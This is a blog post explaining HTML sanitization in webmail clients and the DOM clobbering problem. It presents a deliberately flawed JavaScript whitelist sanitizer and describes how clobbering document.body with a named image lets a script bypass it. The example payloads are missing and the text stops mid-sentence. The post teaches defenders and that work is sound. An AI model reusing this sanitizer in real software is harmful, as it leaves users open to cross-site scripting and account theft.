Sanitizing HTML – the DOM clobbering issue
December 20, 2015
When email first began, back in the mists of computing history, messages were only plain text. As it moved into the mainstream, users wanted to to add more advanced formatting and so email clients allowed HTML to be used to mark up rich-text emails, since it seemed to be working so well for this whole world wide web thing.
While adding immense formatting power to email, the lack of any standardization of exactly what subset of HTML and CSS to support has led to a world of pain for authors looking to make their emails render consistently everywhere. Email clients range from full support for pretty much all of the latest HTML/CSS features (such as in Apple’s Mail.app), to Microsoft Outlook, which thinks that Word is an acceptable HTML renderer. Sigh.
Developers of webmail systems have an extra problem to deal with. The HTML of the email must be embedded inside the site’s HTML that defines the whole user interface. It must do this without breaking the rest of the HTML, and most importantly without allowing any script or other potentially malicious content to be inserted. Since the code would execute in the same context as that of the webmail system itself, it could potentially take over the user’s account and steal their data. (This is known as a Cross-Site Scripting, or XSS, attack.) Therefore the HTML in the email must be transformed, or sanitized, from the original format to a version that preserves as much formatting as possible while removing anything potentially dangerous.
HTMl is essentially just a serialization format for the Document Object Model (DOM). In order to be 100% safe in sanitising it, your code must know exactly how the browser will interpret the HTML when building its DOM tree. For various reasons, this is very complicated. There is now a spec that defines how to handle every edge case, however it is long and pretty much only web browsers have ever implemented it fully. Therefore, most sanitizers that operate on the server do so using a simplified version; and any discrepancies may lead to security holes.
For rich web clients that construct the UI using JavaScript however, there is an alternative option: sanitising in the browser. The hardest part about HTML sanitization is parsing the DOM exactly as the browser does. And the one thing that you can guarantee will parse the HTML exactly as the browser does, is the browser itself!
All modern (and even most not-so-modern) browsers now include APIs for parsing HTML into a DOM tree without executing any scripts, or loading any network requests (like images). You can then manipulate this to clean up anything potentially dangerous before importing it into your “live” DOM (which results in scripts being run, images being loaded, and the user seeing the result on their screen).
So now our sanitization is simple, right? We iterate through the inert DOM tree, apply a whitelist of allowed tags and attributes, remove anything we don’t want and then import the final safe result. Well, kind of, yes. But oh my, the devil is in the details. Allow me to introduce you to DOM clobbering…
DOM Clobbering
The DOM is the API that allows JavaScript code run in the browser to access and manipulate a tree-based representation of the document, initially built by parsing the HTML of the page. The original APIs were thrown together quickly by a single browser, without standardisation and then copied by all the other browsers in order to maintain compatibility with sites coded specifically to their competitor. Thankfully, that’s not how things work today (at least, most of the time!), but all modern browsers still maintain support for these outdated features so that (very) old pages continue to work.
You absolutely do not want to use these features in any new code, as they are astonishingly badly thought out, and there are much better ways now to accomplish the same things. However, this means that many people don’t know or have forgotten about them. And their presence can still lead to massive security holes.
Let’s look at the problem by example. Here’s a little script that looks perfectly reasonable for sanitizing some untrusted HTML. We use a whitelist only so we can’t be fooled be malicious things we don’t know about, and for the sake of this exercise let’s presume that we haven’t accidentally allowed something that could be used maliciously to appear in the whitelist.
`// A real whitelist would probably include a lot more safe things!
// This has been abbreviated for demonstration purposes.
var whitelist = {
nodes: { BODY: true, FORM: true, A: true, B: true, IMG: true },
attributes: { alt: true, style: true }
};
function cleanNode( node ) {
if ( !whitelist.nodes[ node.nodeName ] ) {
node.parentNode.removeChild( node );
return;
}
var attributes = node.attributes;
var children = node.childNodes;
var l;
l = attributes.length;
while ( l-- ) {
name = attributes[l].name;
if ( !whitelist.attributes[ name ] ) {
node.removeAttribute( name );
}
}
l = children.length;
while ( l-- ) {
cleanNode( children[l] );
}
}`
`function sanitiseHTML( html ) {
var doc = new DOMParser().parseFromString( html, 'text/html' );
cleanNode( doc.body );
return doc.body.innerHTML;
}`
For those not familiar with JavaScript, briefly this code does the following:
1. Creates an inert document and parses our potentially dangerous HTML.
2. Starting at the `<body>` node (the root node for user-visible content), it uses a simple recursive descent to walk the DOM tree and remove any attribute or node not in the whitelist. If a node is "bad", we remove it and all its children; we don't try to keep the children at all.
3. We then return the HTML that represents the now "clean" DOM.
At first glance, this looks perfectly reasonable. And indeed, a quick Google around shows [very similar looking functions in the wild](https://github.com/basecamp/trix/blob/d42e722c7af21572fc8386a0f20351151062845d/src/trix/models/html_parser.coffee#L227). Sadly, this is actually riddled with security holes, and the main reason is DOM clobbering. Let's have a look at a few ways we can break this (there are more; I leave those as an exercise to the reader).
### Security hole 1
For this first method of breaking the above, we'll presume "name" is not in your whitelist of allowed attributes, because you don't want to risk a conflict with existing names you already have in the page. Perfectly reasonable, very security conscious. But now if you pass the following to the sanitizer:
You'll find the output is this (except in Chrome, which seems to have recently fixed this kind of clobbering; good job Chrome):
Oh dear! The attacker just managed to get a script through, and your users' data has now been compromised. How did this happen? Well, if you have an `<img>` with a `name` attribute, the browser will helpfully add a property with that name on the `document` object that gives direct access to the DOM node representing the image, even though this masks the original property (the root `<body>` node)! So when we call `cleanNode( doc.body )`, we actually just sanitize the image and never see the rest of the document.
The really clever bit is that the sanitization of the image removes the `name` attribute, which stops the property from masking the actual `body` node on the `document`, so when we return the `innerHTML` we actually return all the nodes, including the unsanitised `<script>`!
### Security hole 2
OK, let's say you've fixed that (maybe you cached a known-good reference to the `document.getElementsByTagName` method and called that to get the `<body>`). Feeling safe now? Well sorry, our code is still fatally flawed. Consider the following HTML:
```
You might guess where this is going. The `childNodes` property on the `